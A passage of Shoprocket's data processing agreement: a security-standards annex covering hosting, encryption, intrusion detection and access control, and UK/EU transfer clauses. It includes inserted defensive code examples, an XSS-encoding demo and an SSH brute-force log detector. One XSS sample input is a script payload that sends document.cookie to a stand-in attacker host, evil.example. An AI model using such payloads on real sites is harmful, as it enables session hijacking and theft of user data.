The SaaS model establishes a division of labour with regard to implementing the technical and organisational safeguards needed to protect the Personal Data. Shoprocket is responsible for designing the access management and network security controls according to which Personal Data is stored in the cloud (security in the cloud). As cloud service providers and Shoprocket’s sub-processors, AWS and Hetzner Online are responsible, as applicable, for maintaining the security of the underlying cloud environment and physical servers in which the Personal Data is stored, including implementing technical and physical measures to protect their data centres and network architecture against unauthorised access (security of the cloud).
In more detailed terms, this means that Shoprocket is responsible for managing the security of the Shoprocket application software (including updates and security patches to the Shoprocket application software), as well as the configuration of any security-related features that AWS and Hetzner Online provide as part of their cloud service offerings. In turn, AWS and Hetzner Online operate, manage and control (as applicable) the components from the host operating system and virtualisation layer down to the physical security of the facilities in which the Shoprocket application service operates and its associated data is stored.
We call this a ‘Shared Responsibility Model,’ as it means that in addition to implementing substantial technical and organisational measures of our own, we rely on the extensive security mechanisms of AWS and Hetzner Online.
Further information on how AWS implements this ‘Shared Responsibility Model’ can be found here, details of the technical and organisational measures AWS implements are located here, and particulars of the physical measures AWS deploys to protect its data centres are provided here.
Further information on the physical, network and system security measures that Hetzner Online deploys to safeguard its data centres and the data stored within them can be found here.
- AWS and Hetzner Online Servers
AWS
Under Article 28 UK GDPR, Shoprocket is required to use only cloud computing processors that provide sufficient guarantees of their ability to implement the data security measures required by Article 32 UK GDPR.
We have selected AWS as our principal hosting provider, infrastructure partner and cloud computing processor on the basis of a careful selection process, taking into account legal, organisational and technical measures. We chose AWS because its IT architecture and infrastructure have been certified as being designed and managed in accordance with industry-leading best practices and security standards, including:
- SOC 1/SSAE 16/ISAE 3402;
- SOC 2;
- SOC 3;
- FISMA, DIACAP, and FedRAMP;
- DOD CSM Levels 1-5;
- PCI DSS Level 1;
- ISO 9001/ISO 27001/ISO 27017/ISO 27018;
- ITAR;
- FIPS 140-2;
- MTCS Level 3;
- HITRUST.
AWS provides a wide range of information regarding its IT control environment and security measures to customers through white papers, reports, certifications, accreditations and other third-party audits. For more information, see AWS Compliance.
To best ensure that data cannot be used, disclosed or transferred without authorisation, we have technically and contractually restricted the AWS regions in which Personal Data can be stored to those in the EU/EEA and have restricted access options accordingly.
Hetzner Online
Shoprocket has chosen Hetzner Online as a reliable partner to provide it with additional dedicated server space. Hetzner Online is certified in accordance with DIN ISO/IEC 27001, the internationally recognised standard for information security, which certifies that Hetzner Online has established and implemented an appropriate Information Security Management System (“ISMS”).
Hetzner Online applies the ISMS to its infrastructure and operations at both of its German data centre parks, Nuremberg and Falkenstein, the latter being where Shoprocket leases its dedicated server space. FOX Certification, a third-party certification body, has audited and certified the ISMS processes of Hetzner Online’s data centre parks.
- Design, Integrity and Availability of Shoprocket Application
The Shoprocket application has been developed using a JavaScript framework and runs against a cloud-deployed MySQL database hosted on Amazon’s Relational Database Service (“Amazon RDS”). As Shoprocket is hosted entirely in the cloud and operates no physical servers of its own, it operates according to the ‘Shared Responsibility Model’ outlined above, whereby AWS is responsible for operating the routers, load balancers, DNS servers and physical servers that support the Shoprocket application.
Shoprocket has chosen to host its MySQL database on Amazon RDS due to the documented performance, availability and data security levels it offers. Amazon RDS’ underlying computing power means that the MySQL database can sustain 40,000 input/output operations per second (IOPS), while AWS’ scalable infrastructure automatically balances and distributes network traffic to the Shoprocket application across multiple EEA availability zones, so that the deployment of the application remains stable regardless of usage levels.
In the event of any substantial interruption of service or data loss, Amazon RDS enables Shoprocket’s MySQL database to be recovered to any point within a period of thirty-five days. Shoprocket similarly maintains daily backups of the Shoprocket application and its related data stores on the Amazon S3 storage service. Backups are stored in a different AWS region (within the EU/EEA, consistent with the region restriction described below) from the primary data storage location, so that backups remain accessible in the event of a technical or physical compromise of the eu-west-1 region.
Similarly, Shoprocket stores back-ups of certain application data on dedicated server space leased from Hetzner Online. Security updates are continuously applied by Hetzner Online to its dedicated servers, and a central back-up server saves back-up data from the dedicated server. The RAID-1 hard disk configuration used on the dedicated servers further reduces the likelihood of data loss from a single disk failure.
In designing and coding the Shoprocket application, Shoprocket has taken into account research into common vulnerabilities in web applications, including reviewing the Shoprocket application against the periodically updated OWASP Top Ten list of common web application security risks published by the Open Web Application Security Project (“OWASP”).
Shoprocket has notably designed the application to neutralise the risk of cross-site scripting (“XSS”), a vulnerability that has been identified in a number of major e-commerce applications that use JavaScript frameworks, and which has been used to orchestrate denial of service attacks and payment card theft. A custom sanitisation and filtering function has been built into the application’s source code so as to separate client-side and server-side data, and to prevent untrusted user input from reaching the application without prior validation or encoding. The Shoprocket application similarly integrates an external jQuery library that provides a sanitisation function for data passed to the application. Because a user who controls the browser can bypass any client-side sanitisation, validation and output encoding on the server side remain the primary control.
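The XSS control described above, illustrated as an added example in plain Node.js; this is not Shoprocket’s code or its sanitisation function. The product-review template, the `encodeHtml` helper, the crude `containsActiveContent` check and the three sample inputs are all constructed for the demonstration. It shows the same template rendered once with raw user input and once with context-appropriate HTML encoding, and that the encoded version neutralises both a `<script>` injection and an attribute break-out.

```javascript
// Added example, not Shoprocket's code: HTML output encoding as an XSS control.
// renderReviewVulnerable interpolates untrusted input straight into markup;
// renderReviewHardened encodes every untrusted value for the HTML context it
// lands in (text node or double-quoted attribute value).

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// Encode a value for use inside an HTML text node or a double-quoted attribute.
// A single-pass replace means the '&' produced for one character is never
// re-encoded, so the output is safe to emit once and not encode again.
function encodeHtml(input) {
  return String(input).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: trusts the product name and review text as they were submitted.
function renderReviewVulnerable(review) {
  return `<div class="review" data-product="${review.product}"><p>${review.text}</p></div>`;
}

// Hardened: the same template, with encoding applied at the point of output.
function renderReviewHardened(review) {
  return `<div class="review" data-product="${encodeHtml(review.product)}"><p>${encodeHtml(review.text)}</p></div>`;
}

// Crude check used only for this demonstration (assumption: not an HTML parser):
// a raw <script tag, or a raw quote followed by an on* event-handler attribute,
// means the input broke out of the context the template intended for it.
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /"\s+on\w+\s*=\s*"/i.test(html);
}

// Constructed sample inputs: one benign review and two common XSS probes.
const SAMPLE_REVIEWS = [
  { product: 'Widget', text: 'Great product, fast delivery.' },
  { product: 'Widget', text: '<script>fetch("https://evil.example/?c=" + document.cookie)</script>' },
  { product: 'Widget" onmouseover="alert(1)', text: 'ok' },
];

// Returns, per sample, whether each renderer produced active content.
function evaluate() {
  return SAMPLE_REVIEWS.map((review) => ({
    vulnerable: containsActiveContent(renderReviewVulnerable(review)),
    hardened: containsActiveContent(renderReviewHardened(review)),
  }));
}

console.log(evaluate());
```

The encoding is applied per output context: the same helper serves both text nodes and double-quoted attributes, but a value placed into a URL, a JavaScript string or a CSS property would need a different encoder, which is the usual gap a generic “sanitise everything” function leaves open.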
Shoprocket engages a specialist third-party security tester to review its source code for any vulnerabilities, and to perform an annual penetration test of its application and infrastructure. Shoprocket further employs a third-party application vulnerability scanning service.
- Encryption
An essential core element of Shoprocket’s security measures is encryption of data both at rest and in transit. All external network communication between customers and the Shoprocket application over public networks uses Transport Layer Security (“TLS”) 1.2 or higher. Personal Data stored on Shoprocket’s AWS and Hetzner Online servers is encrypted using AES-256.
Shoprocket uses the AWS Key Management Service (“AWS KMS”) and Hetzner Online’s full-disk encryption to encrypt Personal Data.
AWS KMS is designed so that no one, including Shoprocket or AWS staff, can access the plaintext key material. AWS KMS uses hardware security modules (“HSMs”) that have been or are currently validated in accordance with FIPS 140-2 to protect the confidentiality of the plaintext keys used to encrypt the Personal Data. All KMS keys are automatically rotated once a year.
Hetzner Online’s full-disk encryption uses the AES-256 algorithm and mandatory authentication processes to encrypt the drives in its dedicated servers. This minimises the risk of data loss and unauthorised access to Personal Data if a drive is removed, replaced or decommissioned; full-disk encryption does not, however, protect data on a running system from an attacker who has already compromised that system.
Shoprocket’s systems use transport encryption whenever data is transferred over an insecure or public network. The web interface and all APIs connected to the Shoprocket application are accessible only via HTTPS, and client systems must use at least TLS 1.2 to access the Shoprocket system.
- Restriction of server locations to the EEA/EU
Shoprocket stores data exclusively in the EEA, namely at AWS’ data centres in Ireland and Hetzner Online’s data centres in Germany.
This is to best ensure that customer data cannot be used or disclosed without authorisation, particularly in light of the Court of Justice of the European Union’s Schrems II judgment of 16 July 2020 and data protection experts’ concerns regarding laws in the United States and other non-EEA jurisdictions that can compel the surrender of data to public authorities.
- Availability Zones
Whether hosted on AWS or Hetzner Online, all front-end and back-end systems operated by Shoprocket are redundant and distributed across multiple availability zones in the EEA. This ensures that if one availability zone fails, the Shoprocket application can continue to operate without restriction.
Each availability zone is connected to several internet service providers and is supplied by several power circuits. They are interconnected via high-speed links so that applications distributed across multiple zones can use LAN connections to communicate between zones. This enables optimal performance of all systems used by the Shoprocket application.
- Intrusion detection
Shoprocket uses an intrusion detection system ( “IDS”) that monitors security-related events in Shoprocket’s systems. The IDS monitors:
- Log files for unusual or unknown entries;
- Changes to systems files (file integrity monitoring) as well as AWS’ own configuration;
- All login attempts as well as changes in user rights within the systems;
- Changes in the device file system and the loaded kernel modules to detect the connection of unauthorised hardware;
- Network traffic:
- Known exploits and rootkits;
- Spoofing
- All changes to the IDS itself including restarts or failures;
- API events triggered by users within AWS account environments;
- Unused services or users on the respective systems;
- Changes in used (network) ports.
If security-related anomalies are detected on a system, they are automatically reported to the relevant Shoprocket staff, who then perform a manual check of the anomaly. Particularly critical anomalies, such as a detected rootkit, are automatically blocked. Furthermore, the IDS supports security policy enforcement that meets the requirements of PCI DSS 3.0.
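The “all login attempts” item in the list above is the kind of signal an IDS turns into an alert. As an added example, and not Shoprocket’s IDS or its rules, the detector below runs over a constructed, simplified sshd-style auth log (RFC 3339 timestamp, no hostname field) in Node.js. The threshold of five failures in a sixty-second sliding window, the sample IP addresses and the log lines are all assumptions made for the demonstration. It alerts once per source on a burst of failures and, separately, on a successful login from a source that has already produced such a burst, which is the case that actually warrants paging someone.

```javascript
// Added example, not Shoprocket's IDS: a small failed-login detector run over
// constructed, simplified sshd-style auth log lines. It alerts when one source
// IP produces `threshold` or more failed logins inside a sliding window of
// `windowSeconds`, and flags any later successful login from that source.

const LOG_RE = /^(\S+)\s+sshd\[\d+\]:\s+(Failed|Accepted) (?:password|publickey) for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)/;

// Returns {ts, outcome, user, ip} or null for lines that are not auth events.
function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const ts = Date.parse(m[1]);
  if (Number.isNaN(ts)) return null;
  return { ts, outcome: m[2], user: m[3], ip: m[4] };
}

function detectBruteForce(lines, { threshold = 5, windowSeconds = 60 } = {}) {
  const recentFailures = new Map(); // ip -> timestamps (ms) of failures still inside the window
  const burstSources = new Set();   // ips that have already triggered a brute_force alert
  const alerts = [];
  for (const line of lines) {
    const ev = parseLine(line);
    if (!ev) continue;
    if (ev.outcome === 'Failed') {
      const hits = (recentFailures.get(ev.ip) || []).filter((t) => ev.ts - t <= windowSeconds * 1000);
      hits.push(ev.ts);
      recentFailures.set(ev.ip, hits);
      if (hits.length >= threshold && !burstSources.has(ev.ip)) {
        burstSources.add(ev.ip);
        alerts.push({ type: 'brute_force', ip: ev.ip, count: hits.length, at: new Date(ev.ts).toISOString() });
      }
    } else if (burstSources.has(ev.ip)) {
      // A success following a burst from the same source is the case worth paging on.
      alerts.push({ type: 'success_after_burst', ip: ev.ip, user: ev.user, at: new Date(ev.ts).toISOString() });
    }
  }
  return alerts;
}

// Constructed log: 203.0.113.7 fails five times in 16 s and then succeeds;
// 198.51.100.9 fails five times in total but only four inside any 60 s window;
// 192.0.2.5 is an ordinary key-based login; one non-auth line is ignored.
const SAMPLE_LOG = [
  '2022-08-30T10:00:00+00:00 sshd[3101]: Failed password for root from 198.51.100.9 port 40211 ssh2',
  '2022-08-30T10:00:01+00:00 sshd[3102]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2',
  '2022-08-30T10:00:05+00:00 sshd[3103]: Failed password for invalid user admin from 203.0.113.7 port 51236 ssh2',
  '2022-08-30T10:00:09+00:00 sshd[3104]: Failed password for root from 203.0.113.7 port 51240 ssh2',
  '2022-08-30T10:00:13+00:00 sshd[3105]: Failed password for deploy from 203.0.113.7 port 51244 ssh2',
  '2022-08-30T10:00:17+00:00 sshd[3106]: Failed password for deploy from 203.0.113.7 port 51250 ssh2',
  '2022-08-30T10:00:20+00:00 sshd[3107]: Accepted password for deploy from 203.0.113.7 port 51300 ssh2',
  '2022-08-30T10:00:30+00:00 sshd[3108]: Accepted publickey for ops from 192.0.2.5 port 40000 ssh2',
  '2022-08-30T10:00:31+00:00 sshd[3108]: pam_unix(sshd:session): session opened for user ops',
  '2022-08-30T10:05:00+00:00 sshd[3110]: Failed password for root from 198.51.100.9 port 40300 ssh2',
  '2022-08-30T10:05:02+00:00 sshd[3111]: Failed password for root from 198.51.100.9 port 40302 ssh2',
  '2022-08-30T10:05:04+00:00 sshd[3112]: Failed password for root from 198.51.100.9 port 40304 ssh2',
  '2022-08-30T10:05:06+00:00 sshd[3113]: Failed password for root from 198.51.100.9 port 40306 ssh2',
];

function runSample() {
  return detectBruteForce(SAMPLE_LOG);
}

console.log(runSample());
```

The sliding window is what keeps the slow source (198.51.100.9) below threshold; widening the window to ten minutes makes it alert too, which is the usual tuning trade-off between catching low-and-slow attempts and paging on noise.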
- Logging/Audit Trail
Shoprocket uses logging in its AWS environments for several areas. These include:
- System events;
- Error logging;
- User activity;
- Logins and requests to database systems;
- Other security-related events/audit logging.
By using AWS CloudTrail, Shoprocket is able to record all API events within the cloud environments it uses, thereby not only creating a transparent record of user and resource activity but also providing a basis for forensic analysis of potential security incidents. The information collected by AWS CloudTrail is analysed to detect anomalies in a timely manner.
- Monitoring
Shoprocket uses various monitoring tools to ensure maximum availability and performance of the Shoprocket systems and application. These monitor at least the following parameters:
Availability
- Accessibility of the application;
- Accessibility of backend systems and services;
Resources
- CPU utilisation
- Utilisation of network interfaces
- Utilisation of persistent and volatile storage (disk and memory)
Performance
- Application response times
- Response times of back-end systems
- Query times for MySQL database contents.
Security
- IDS performance
- Update status of systems.
Logs
- Error logs;
- Access logs.
In addition to this automated monitoring, Shoprocket employees monitor relevant online media and blogs (including the OWASP updates referenced above) in order to be able to react promptly to newly published vulnerabilities.
- Security audits and penetration tests.
Shoprocket conducts both internal and external security tests at relevant intervals. In addition the security of the Shoprocket application is regularly checked for possible vulnerabilities by an external provider. Furthermore, internal audits are also carried out by the Shoprocket staff in which not only the technical, but also the organisational measures within the company are examined for effectiveness.
- Change Management
Shoprocket stores the associated code for each configuration of its system and software in repositories of a version management system to make changes traceable in terms of time and content. Before changes are imported into the operating environment, they are tested in a staging environment that is identical to the operating environment.
- Access Control
Shoprocket assigns its employees and contractors different levels of access to its systems and services on AWS’ and Hetzner Online’s servers. These are managed through AWS’ and Hetzner Online’s respective Identity and Access Management (IAM) systems, which enable fine-grained control of access to different services.
The overriding principle for Shoprocket when assigning rights to its personnel is “need-to-know.” In practice, this means that Shoprocket staff are given access only to those functions they need to perform their jobs. Access to back-end systems is possible only via secure and authenticated connections, and back-end systems are not exposed publicly. Only a strictly limited number of Shoprocket personnel have access to the system that stores customer data. This direct access is used exclusively for error analysis and is monitored.
Annex B
Cross-Border Transfers
PART 1 – ex-EEA Transfers
1. Annex I.A of the Standard Contractual Clauses shall be completed as follows:
Data Exporter: You (As detailed in the Agreement).
Contact details: Your contact details (As detailed in the Agreement).
Data Exporter Role: Data Controller.
- Module One: The Data Exporter is a Data Controller.
- Module Two: The Data Exporter is a Data Controller.
Signature and Date: By entering into the Agreement and DPA, Data Exporter is deemed to have signed these Standard Contractual Clauses incorporated herein, including their Annexes, as of the Effective Date of the Agreement.
Data Importer: Shoprocket.
Contact details: As detailed in the Agreement.
Data Importer Role:
- Module One: The Data Importer is a Data Controller (Module One relates to Client Account Data and Client Usage Data).
- Module Two: The Data Importer is a Data Processor (Module Two relates to all Personal Data except for the Client Account Data and Client Usage Data).
Signature and Date: By entering into the Agreement and DPA, Data Importer is deemed to have signed these Standard Contractual Clauses, incorporated herein, including their Annexes, as of the Effective Date of the Agreement.
2. Annex I.B of the Standard Contractual Clauses shall be completed as follows:
The categories of data subjects are described in clause 4.6 of the Addendum.
The categories of Personal Data are described in clause 4.5 of the Addendum.
The Parties do not intend for Special Category Data to be transferred.
The frequency of the transfer is a continuous basis for the duration of the Agreement.
The nature of the processing is described in clause 4.4 of the Addendum.
The purpose of the processing is described in clause 4.3 of the Addendum.
The period for which the Personal Data will be retained is for the duration of the Agreement, unless agreed otherwise in the Agreement and/or the DPA.
In relation to transfers to Sub-processors, the subject matter, nature, and duration of the processing is set forth in clause 9 of the Addendum.
3. Annex I.C of the Standard Contractual Clauses shall be completed as follows:
The competent Supervisory Authority in accordance with Clause 13 is the supervisory authority in the Member State stipulated in clause 10(e) of this Addendum.
The Shoprocket Security Standards (Annex A) shall serve as the documentation and particulars required in Annex II of the Standard Contractual Clauses.
4. To the extent there is any conflict between the Standard Contractual Clauses and any other terms in this DPA or the Agreement, the provisions of the Standard Contractual Clauses will prevail.
PART 2 – ex- UK Transfers
1. The parties agree that the IDTA Addendum shall apply to an ex-UK Transfer and this Part 2 is effective from 21 March 2022.
2. Unless defined in the Agreement, defined terms in this Part 2 of Annex B shall have the meanings given in “Part 2: Mandatory Clauses” below.
Part 1: Tables
Table 1 of the IDTA Addendum
3. Table 1 of the IDTA Addendum shall be completed as follows:
- Data Exporter: You (As detailed in the Agreement).
- Contact details: As detailed in the Agreement.
Signature and Date: By entering into the Agreement and the Addendum, Data Exporter is deemed to have signed this IDTA Addendum incorporated herein, as of the Effective Date of the Agreement.
- Data Importer: Shoprocket.
- Contact details: As detailed in the Agreement.
Signature and Date: By entering into the Agreement and DPA, Data Importer is deemed to have signed this IDTA Addendum, incorporated herein, as of the Effective Date of the Agreement.
Table 2 of the IDTA Addendum
4. Table 2 of the IDTA Addendum shall be completed as follows:
Addendum EU SCCs | The Approved EU SCCs, including the Appendix Information and with only the following modules, clauses or optional provisions of the Approved EU SCCs brought into effect for the purposes of this Addendum: |
Module in operation | Clause 7 (Docking Clause) | Clause 11 (Option) | Clause 9a (Prior Authorisation or General Authorisation) | Clause 9a (Time period) | Is personal data received from the Importer combined with personal data collected by the Exporter? |
1 | Shall not apply | Shall not apply | General Authorisation | As set out in clause 9.2 of the Addendum (30 days). | No |
2 | Shall not apply | Shall not apply | General Authorisation | As set out in clause 9.2 of the Addendum (30 days). | No |
Table 3 of the IDTA Addendum
5. Annex IA shall be completed as follows:
Data Exporter: You (As detailed in the Agreement).
Contact details: Your contact details (As detailed in the Agreement).
Data Exporter Role: Data Controller.
- Module One: The Data Importer is a Data Controller.
- Module Two: The Data Importer is a Data Controller.
- Module Two: The Data Exporter is a Data Controller.
Signature and Date: By entering into the Agreement and DPA, Data Exporter is deemed to have signed the Approved EU SCCs, incorporated herein, including their Annexes, as of the Effective Date of the Agreement.
Data Importer: Shoprocket.
Contact details: As detailed in the Agreement.
Data Importer Role:
- Module One: The Data Importer is a Data Controller (Module One relates to Client Account Data and Client Usage Data).
- Module Two: The Data Importer is a Data Processor (Module Two relates to all Personal Data except for the Client Account Data and Client Usage Data).
6. Annex I.B shall be completed as follows:
The categories of data subjects are described in clause 4.6 of the Addendum.
The categories of Personal Data are described in clause 4.5 of the Addendum.
The Parties do not intend for Special Category Data to be transferred.
The frequency of the transfer is a continuous basis for the duration of the Agreement.
The nature of the processing is described in clause 4.4 of the Addendum.
The purpose of the processing is described in clause 4.3 of the Addendum.
The period for which the Personal Data will be retained is for the duration of the Agreement, unless agreed otherwise in the Agreement and/or the DPA.
In relation to transfers to Sub-processors, the subject matter, nature, and duration of the processing is set forth in clause 9 of the Addendum.
Annex III: List of Sub-processors shall not apply as Shoprocket has a general written authorisation to use Sub-processors.
Table 4 of the IDTA Addendum
7. The Importer may end this IDTA Addendum as set out in clause 26 of this IDTA Addendum.
Part 2: Mandatory Clauses
8. Each Party agrees to be bound by the terms and conditions set out in this IDTA Addendum, in exchange for the other Party also agreeing to be bound by this IDTA Addendum.
9. Although Annex 1A and Clause 7 of the Approved EU SCCs require signature by the Parties, for the purpose of making Restricted Transfers, the Parties may enter into this IDTA Addendum in any way that makes them legally binding on the Parties and allows data subjects to enforce their rights as set out in this Addendum. Entering into this IDTA Addendum will have the same effect as signing the Approved EU SCCs and any part of the Approved EU SCCs.
Interpretation of this IDTA Addendum
10. Where this IDTA Addendum uses terms that are defined in the Approved EU SCCs those terms shall have the same meaning as in the Approved EU SCCs. In addition, the following terms have the following meanings:
Addendum | This International Data Transfer Addendum which is made up of this IDTA Addendum incorporating the Addendum EU SCCs. |
Addendum EU SCCs | The version(s) of the Approved EU SCCs which this IDTA Addendum is appended to, as set out in Table 2, including the Appendix Information. |
Appendix Information | As set out in Table 3. |
Appropriate Safeguards | The standard of protection over the Personal Data and of Data Subjects’ rights, which is required by UK Data Protection Laws when you are making a Restricted Transfer relying on standard data protection clauses under Article 46(2)(d) UK GDPR. |
Approved Addendum | The template Addendum issued by the UK ICO and laid before UK Parliament in accordance with s119A of the Data Protection Act 2018 on 2 February 2022, as it is revised under clause 25 below. |
Approved EU SCCs | The Standard Contractual Clauses set out in the Annex of Commission Implementing Decision (EU) 2021/914 of 4 June 2021. |
ICO | The UK Information Commissioner. |
Restricted Transfer | A transfer which is covered by Chapter V of the UK GDPR. |
UK | The United Kingdom of Great Britain and Northern Ireland. |
UK Data Protection Laws | All laws relating to data protection, the processing of personal data, privacy and/or electronic communications in force from time to time in the UK, including the UK GDPR and the Data Protection Act 2018. |
UK GDPR | As defined in section 3 of the Data Protection Act 2018. |
11. This IDTA Addendum must always be interpreted in a manner that is consistent with UK Data Protection Laws and so that it fulfils the Parties’ obligation to provide the Appropriate Safeguards.
12. If the provisions included in the Addendum EU SCCs amend the Approved EU SCCs in any way which is not permitted under the Approved EU SCCs or the Approved Addendum, such amendment(s) will not be incorporated in this IDTA Addendum and the equivalent provision of the Approved EU SCCs will take their place.
13. If there is any inconsistency or conflict between UK Data Protection Laws and this IDTA Addendum, UK Data Protection Laws applies.
14. If the meaning of this IDTA Addendum is unclear or there is more than one meaning, the meaning which most closely aligns with UK Data Protection Laws applies.
15. Any references to legislation (or specific provisions of legislation) means that legislation (or specific provision) as it may change over time. This includes where that legislation (or specific provision) has been consolidated, re-enacted and/or replaced after this IDTA Addendum has been entered into.
Hierarchy
16. Although Clause 5 of the Approved EU SCCs sets out that the Approved EU SCCs prevail over all related agreements between the parties, the parties agree that, for Restricted Transfers, the hierarchy in Section 17 will prevail.
17. Where there is any inconsistency or conflict between the Approved Addendum and the Addendum EU SCCs (as applicable), the Approved Addendum overrides the Addendum EU SCCs, except where (and in so far as) the inconsistent or conflicting terms of the Addendum EU SCCs provides greater protection for data subjects, in which case those terms will override the Approved Addendum.
18. Where this IDTA Addendum incorporates Addendum EU SCCs which have been entered into to protect transfers subject to the General Data Protection Regulation (EU) 2016/679 then the Parties acknowledge that nothing in this IDTA Addendum impacts those Addendum EU SCCs.
Incorporation of and changes to the EU SCCs
19. This IDTA Addendum incorporates the Addendum EU SCCs which are amended to the extent necessary so that:
- together they operate for data transfers made by the data exporter to the data importer, to the extent that UK Data Protection Laws apply to the data exporter’s processing when making that data transfer, and they provide Appropriate Safeguards for those data transfers;
- Clauses 16 to 18 above override Clause 5 (Hierarchy) of the Addendum EU SCCs; and
- this IDTA Addendum (including the Addendum EU SCCs incorporated into it) is (1) governed by the laws of England and Wales and (2) any dispute arising from it is resolved by the courts of England and Wales, in each case unless the laws and/or courts of Scotland or Northern Ireland have been expressly selected by the Parties.
20. Unless the Parties have agreed alternative amendments which meet the requirements of the above clause 19, the provisions of Section 22 will apply.
21. No amendments to the Approved EU SCCs other than to meet the requirements of Section 19 may be made.
22. The following amendments to the Addendum EU SCCs (for the purpose of Section 19) are made:
- References to the “Clauses” means the IDTA Addendum, incorporating the Addendum EU SCCs;
- In Clause 2, delete the words: “and, with respect to data transfers from controllers to processors and/or processors to processors, standard contractual clauses pursuant to Article 28(7) of Regulation (EU) 2016/679”;
- Clause 6 (Description of the transfer(s)) is replaced with: “The details of the transfer(s), and in particular the categories of personal data that are transferred and the purpose(s) for which they are transferred, are those specified in Annex I.B where UK Data Protection Laws apply to the data exporter’s processing when making that transfer.”;
- Clause 8.8(i) of Module 2 is replaced with: “the onward transfer is to a country benefitting from adequacy regulations pursuant to Section 17A of the UK GDPR that covers the onward transfer;”
- References to “Regulation (EU) 2016/679”, “Regulation (EU) 2016/679 of the European Parliament and of the Council of 27 April 2016 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data (General Data Protection Regulation)” and “that Regulation” are all replaced by “UK Data Protection Laws”. References to specific Article(s) of “Regulation (EU) 2016/679” are replaced with the equivalent Article or Section of UK Data Protection Laws;
- References to Regulation (EU) 2018/1725 are removed;
- References to the “European Union”, “Union”, “EU”, “EU Member State”, “Member State” and “EU or Member State” are all replaced with the “UK”;
- The reference to “Clause 12(c)(i)” at Clause 10(b)(i) of Module One, is replaced with “Clause 11(c)(i)”;
- Clause 13(a) and Part C of Annex I are not used;
- The “competent supervisory authority” and “supervisory authority” are both replaced with the “Information Commissioner”;
- In Clause 16(e), subsection (i) is replaced with: “the Secretary of State makes regulations pursuant to Section 17A of the Data Protection Act 2018 that cover the transfer of personal data to which these clauses apply;”;
- Clause 17 is replaced with: “These Clauses are governed by the laws of England and Wales.”;
- Clause 18 is replaced with: “Any dispute arising from these Clauses shall be resolved by the courts of England and Wales. A data subject may also bring legal proceedings against the data exporter and/or data importer before the courts of any country in the UK. The Parties agree to submit themselves to the jurisdiction of such courts.”; and
- The footnotes to the Approved EU SCCs do not form part of the IDTA Addendum, except for footnotes 8, 9, 10 and 11.
Amendments to this IDTA Addendum
23. The Parties may agree to change Clauses 17 and/or 18 of the Addendum EU SCCs to refer to the laws and/or courts of Scotland or Northern Ireland.
24. If the Parties wish to change the format of the information included in Part 1: Tables of the Approved Addendum, they may do so by agreeing to the change in writing, provided that the change does not reduce the Appropriate Safeguards.
25. From time to time, the ICO may issue a revised Approved Addendum which:
- makes reasonable and proportionate changes to the Approved Addendum, including correcting errors in the Approved Addendum; and/or
- reflects changes to UK Data Protection Laws;
The revised Approved Addendum will specify the start date from which the changes to the Approved Addendum are effective and whether the Parties need to review this IDTA Addendum including the Appendix Information. This IDTA Addendum is automatically amended as set out in the revised Approved Addendum from the start date specified.
26. If the ICO issues a revised Approved Addendum under Section 18, if any Party selected in Table 4 “Ending the Addendum when the Approved Addendum changes”, will as a direct result of the changes in the Approved Addendum have a substantial, disproportionate and demonstrable increase in:
- its direct costs of performing its obligations under the Addendum; and/or
- its risk under the Addendum,
and in either case it has first taken reasonable steps to reduce those costs or risks so that it is not substantial and disproportionate, then that Party may end this IDTA Addendum at the end of a reasonable notice period, by providing written notice for that period to the other Party before the start date of the revised Approved Addendum.
27. The Parties do not need the consent of any third party to make changes to this IDTA Addendum, but any changes must be made in accordance with its terms.